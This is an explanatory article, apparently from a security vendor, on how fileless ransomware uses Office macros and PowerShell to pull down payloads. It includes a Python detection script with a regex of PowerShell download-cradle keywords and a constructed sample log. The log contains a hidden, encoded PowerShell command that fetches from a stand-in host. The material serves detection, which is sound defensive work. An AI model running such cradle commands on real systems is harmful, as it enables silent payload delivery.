How Ransomware Uses PowerShell

Fileless Attacks: The Evolution of Ransomware

Ransomware continues to produce significant revenue for hackers as consumers and companies move toward complete digital storage — if access to personal documents or key corporate information is suddenly and completely restricted, it’s no surprise victims are willing to pay rather than risk complete data destruction. While hackers typically charge individuals between $300 and $500 — usually payable in bitcoin — for the return of their files, companies are often hit with ransoms of 50 to 100 times this amount, making ransomware a lucrative proposition for cybercriminals.

However, malicious actors aren’t content with current attack vectors. 2016 saw a marked rise in the use of “fileless ransomware,” which doesn’t follow the traditional pattern of downloading new files onto a target machine but rather leverages device-native processes, such as PowerShell, to execute attacks.

Upping the Ante

Current ransomware methods can mean big money for attackers, but this malware class wasn’t always so successful. Original iterations focused on locking users out of their devices altogether, but these methods were largely hit-or-miss. As IT security advanced, so too did malware makers, spreading source code online and sharing data to create new attack vectors that appeared to be legitimate files, necessary updates or even trusted emails. Once installed on victim computers, these ransomware payloads leveraged complex encryption to prevent user access to specific files, then often initiated a countdown for payment — after which all files would be destroyed.

In recent years, the ransomware market has grown so rapidly that corporate-like structures have emerged, complete with “customer service” for entry-level hackers trying malware deployment kits, and good-faith file recovery to prove that attackers both possess the encryption keys and are willing to release data upon payment.

The PowerShell Problem

To stay ahead of new IT security techniques such as sandboxing, IP address whitelisting and automated detection, hackers have developed a new class of “fileless” ransomware that doesn’t drop malware downloaders onto devices — since these processes often come with common indicators of attack (IOAs) — but instead leverages existing in-memory processes to start the ransomware download process.

Currently, two vectors (phishing emails and compromised websites) are common, but both starting points lead to the same conclusion — PowerShell. Malicious email attachments use macros to start a command line and then run PowerShell, while compromised sites use exploited apps to do the same. With access to PowerShell, the ransomware can pull down its payload, which in turn encrypts user data, all without the need for “typical” malware files.
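The chain just described (Office macro, then a command line, then PowerShell pulling down a payload) is exactly what process-creation telemetry can expose. The following is an added detection example, not CrowdStrike’s code: it walks made-up Sysmon-style events (the field names mirror Event ID 1; the log lines, paths and the encoded command are constructed) and flags PowerShell processes that descend from an Office application or whose command line, including any decoded `-EncodedCommand` argument, carries download-cradle features.

```python
# Constructed example, not CrowdStrike code: flag the macro -> cmd.exe -> PowerShell
# chain in made-up Sysmon-style process-creation events (Event ID 1 style fields).
import base64, json, re

OFFICE_APPS = {"winword.exe", "excel.exe", "outlook.exe", "powerpnt.exe"}
# Command-line features that typically accompany a PowerShell download cradle.
CRADLE = re.compile(r"DownloadString|DownloadFile|Net\.WebClient|Invoke-WebRequest|"
                    r"Invoke-Expression|\bIEX\b|-enc(odedcommand)?\b|-w(indowstyle)? hidden",
                    re.IGNORECASE)
ENC = base64.b64encode("Invoke-WebRequest http://example.invalid/p".encode("utf-16le")).decode()  # constructed -EncodedCommand value
SAMPLE_LOG = r"""
{"ProcessId": 100, "ParentProcessId": 1, "Image": "C:\\Windows\\explorer.exe", "CommandLine": "explorer.exe"}
{"ProcessId": 200, "ParentProcessId": 100, "Image": "C:\\Office\\WINWORD.EXE", "CommandLine": "WINWORD.EXE /n invoice.docm"}
{"ProcessId": 300, "ParentProcessId": 200, "Image": "C:\\Windows\\System32\\cmd.exe", "CommandLine": "cmd.exe /c powershell -w hidden -enc __ENC__"}
{"ProcessId": 400, "ParentProcessId": 300, "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "CommandLine": "powershell -w hidden -enc __ENC__"}
{"ProcessId": 500, "ParentProcessId": 100, "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "CommandLine": "powershell -File C:\\scripts\\backup.ps1"}
""".replace("__ENC__", ENC)

image_name = lambda path: path.replace("\\", "/").rsplit("/", 1)[-1].lower()

def parse_events(text):
    return [json.loads(line) for line in text.splitlines() if line.strip()]

def decode_encoded_command(cmdline):
    """Decoded -EncodedCommand text (UTF-16LE base64), or '' when absent or malformed."""
    m = re.search(r"-enc(?:odedcommand)?\s+([A-Za-z0-9+/=]+)", cmdline, re.IGNORECASE)
    try:
        return base64.b64decode(m.group(1)).decode("utf-16le") if m else ""
    except (ValueError, UnicodeDecodeError):
        return ""

def find_suspicious_powershell(events):
    """One finding per PowerShell process spawned under an Office app or showing cradle features."""
    by_pid = {e["ProcessId"]: e for e in events}
    findings = []
    for e in events:
        if image_name(e["Image"]) not in {"powershell.exe", "pwsh.exe"}:
            continue
        lineage, seen, cur = [], set(), e
        while cur is not None and cur["ProcessId"] not in seen:  # walk parents; stop on cycle or missing parent
            seen.add(cur["ProcessId"])
            lineage.append(image_name(cur["Image"]))
            cur = by_pid.get(cur["ParentProcessId"])
        text = e["CommandLine"] + " " + decode_encoded_command(e["CommandLine"])  # raw plus decoded payload
        features = sorted({m.group(0).lower() for m in CRADLE.finditer(text)})
        office_parent = any(name in OFFICE_APPS for name in lineage[1:])
        if office_parent or features:
            findings.append({"pid": e["ProcessId"], "lineage": lineage, "office_parent": office_parent, "features": features})
    return findings
```

On the sample log only the PowerShell spawned under WINWORD.EXE via cmd.exe is reported; the scheduled backup script run from explorer.exe is not.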

Ransomware is changing. Traditional payloads are falling out of favor; PowerShell is the new face of fileless attacks.

How Ransomware Uses PowerShell from CrowdStrike